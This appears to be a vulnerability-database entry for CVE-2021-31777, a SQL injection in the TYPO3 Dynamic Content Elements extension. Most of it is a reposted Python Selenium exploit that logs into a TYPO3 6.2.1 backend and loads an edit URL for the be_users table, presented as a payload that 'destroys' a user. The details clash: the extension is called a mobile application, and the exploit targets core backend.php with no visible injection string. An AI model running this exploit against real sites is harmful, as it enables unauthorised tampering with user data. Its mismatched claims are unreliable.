TYPO3 Dynamic Content Element SQL Injection Vulnerability

Vulnerability ID: 2429219
Vulnerability type: SQL injection
Published: 2021-05-04
Updated: 2021-05-04
CVE ID: CVE-2021-31777
CNNVD-ID: CNNVD-202104-1940
Platform: N/A
CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2021050012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202104-1940
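|Vulnerability details
TYPO3 Dynamic Content Element is a mobile application from TYPO3, a Swiss company. It provides TCA mapping and a simple backend view. Dynamic Content Elements contains a SQL injection vulnerability caused by insufficient sanitization of user-supplied data. The following products and versions are affected: Dynamic Content Elements: 2.2.0, 2.2.1, 2.3.0, 2.3.1, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.7.0.
|Vulnerability exploit (EXP)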
# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.02.2021
# Vendor: https://typo3.org/
# Link: https://get.typo3.org/version/6.2.1
# CVE: CVE-2021-31777
# Proof: https://streamable.com/8v7v4i

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-31777

from selenium import webdriver
import time
import os, sys


# Vendor: https://typo3.org/
website_link="http://192.168.1.3/typo3_src-6.2.1/typo3/index.php"

# enter your login username
username="nu11secur1ty"

# enter your login password
password="password"

#enter the element for username input field
element_for_username="username"

#enter the element for password input field
element_for_password="p_field"

#enter the element for submit button
element_for_submit="commandLI"


#browser = webdriver.Safari() #for macOS users [for others use chrome via chromedriver]
browser = webdriver.Chrome() #for chrome users
#browser = webdriver.Firefox() #uncomment this line, for firefox users

time.sleep(3)
browser.get((website_link))

try:
    username_element = browser.find_element_by_name(element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element_by_name(element_for_password)
    password_element.send_keys(password)
    signInButton = browser.find_element_by_name(element_for_submit)
    signInButton.click()

    # Exploit vulnerability MySQL user table by using backend.php vulnerability
    time.sleep(3)
    # Payload link
    browser.get(("http://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#"))

    print("The payload is deployed it is time to destroy some user...\n")
    os.system('pause')

    browser.close()

except Exception:
    #### This exception is if the user is not found in the database or something is wrong.
    print("Sorry, but this user who you searching for is destroyed by using of MySQL vulnerability in backend.php...")

---------------------------------

# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php
# Date: 05.02.2021
# Exploit Author idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://typo3.org/
# Software Link: https://get.typo3.org/version/6.2.1

# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777

|References

Source: vigilance.fr

Link: https://vigilance.fr/vulnerability/TYPO3-Dynamic-Content-Element-SQL-injection-35178


Source: www.cybersecurity-help.cz

Link: https://www.cybersecurity-help.cz/vdb/SB2021042709